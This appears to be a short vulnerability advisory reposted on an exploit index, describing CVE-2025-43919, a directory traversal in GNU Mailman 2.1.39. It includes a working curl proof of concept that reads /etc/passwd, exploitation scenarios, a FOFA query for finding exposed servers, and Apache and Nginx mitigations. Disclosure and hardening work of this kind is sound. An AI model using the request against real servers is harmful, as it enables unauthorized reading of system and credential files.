## https://sploitus.com/exploit?id=730531E0-F350-5DB5-812A-7BDD4D3081D2
### ๐จ CVE-2025-43919: Directory Traversal in GNU Mailman 2.1.39 (cPanel/WHM)
> A new vulnerability has been discovered in GNU Mailman 2.1.39, bundled with cPanel/WHM, allowing unauthenticated remote attackers to read arbitrary files on the server via a directory traversal flaw.
๐ **Vulnerability Summary:**
- **Type**: `Directory Traversal` (Unauthenticated)
- **Component**: `private.py` CGI script
- **Affected Endpoint**: `/mailman/private/mailman`
- **Impact**: Disclosure of files like `/etc/passwd`, `.mbox archives`, and `Mailman configs`
- **CVSS Score**: `5.8 (Medium)`
- **CVE ID**: `CVE-2025-43919`
Status: No official patch (Mailman 2.1.x is EOL)
๐ฅ Proof of Concept:
```
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman
```
๐งจ Exploitation Scenarios:
- Dump `/etc/passwd`, `configs`, or `mailbox files`
- Leak credentials and sensitive archives
- Chain with other bugs for RCE or escalation
๐ก๏ธ Mitigations:
Block access to `/mailman/private` at the web server level:
```
<Location "/mailman/private">
Require ip 127.0.0.1
Deny from all
</Location>
```
Or in Nginx:
```
location /mailman/private {
deny all;
return 403;
}
```
โฌ๏ธ Migrate to **Mailman** **3.x โ 2.x** is EOL and lacks modern protections
๐ FOFA Query : [app="Mailman"](https://en.fofa.info/result?qbase64=YXBwPSJNYWlsbWFuIg%3D%3D)
๐ Learn more, share responsibly, and keep your infra secure.
๐ Follow for more **real-world** CVEs, **PoCs**, and **hardening** tips:
๐ [@cybersecplayground](https://t.me/cybersecplayground)
`#bugbounty` `#infosec` `#exploit` `#pentest` `#cve2025` `#directorytraversal` `#linuxsecurity`